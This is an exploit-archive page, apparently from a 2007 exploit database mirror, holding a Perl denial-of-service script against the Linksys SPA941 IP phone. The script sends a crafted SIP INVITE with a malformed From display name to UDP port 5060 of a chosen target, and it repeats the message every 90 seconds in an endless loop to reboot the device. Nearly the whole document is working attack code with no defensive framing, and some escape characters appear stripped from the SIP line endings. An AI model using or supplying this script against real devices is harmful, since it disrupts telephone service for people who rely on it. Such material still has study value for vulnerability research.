[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linksys SPA941 (remote reboot) Remote Denial of Service Exploit
# Published : 2007-04-24
# Author : MADYNES
# Previous Title : Linksys SPA941 377 character Remote Denial of Service Exploit
# Next Title : Winamp <= 5.33 (.AVI File) Remote Denial of Service Exploit
#!/usr/bin/perl
use IO::Socket;
#die "Usage $0 <username> <dst_IP> <Source_IP> <SourcePort>" unless ($ARGV[2]);
die "Usage $0 <username> <dst_IP> <SourceIp> <sourceport>" unless ($ARGV[0]);
my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => $ARGV[3], Proto => 'udp');
$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060', Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061');
$touser=$ARGV[0];
$target=$ARGV[1];
$sourceaddress=$ARGV[2];
$sourceport=$ARGV[3];
$high=2000;
$low=1;
$fromuserid = int(rand( $high-$low+1 ) ) + $low;
my $cseq = "INVITE";
$msg = "INVITE sip:$touser@$target SIP/2.0r
Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000r
From: 377<sip:$fromuserid@$sourceaddress>;tag=779r
To: Receiver <sip:$touser@$target>r
Call-ID: 10@$sourceaddressr
CSeq: 1 $cseqr
Contact: 779 <sip:$fromuserid@$sourceaddress>r
Expires: 1200r
Max-Forwards: 70r
Content-Type: application/sdpr
Content-Length: 133r
r
v=0r
o=0 0 0 IN IP4 $sourceaddressr
s=Session SDPr
c=IN IP4 $sourceaddressr
t=0 0r
m=audio 9876 RTP/AVP 0r
a=rtpmap:0 PCMU/8000r";
$sock or die "no socket :$!";
while (1){
$socket->send($msg);
sleep 90;
}
# www.Syue.com [2007-04-24]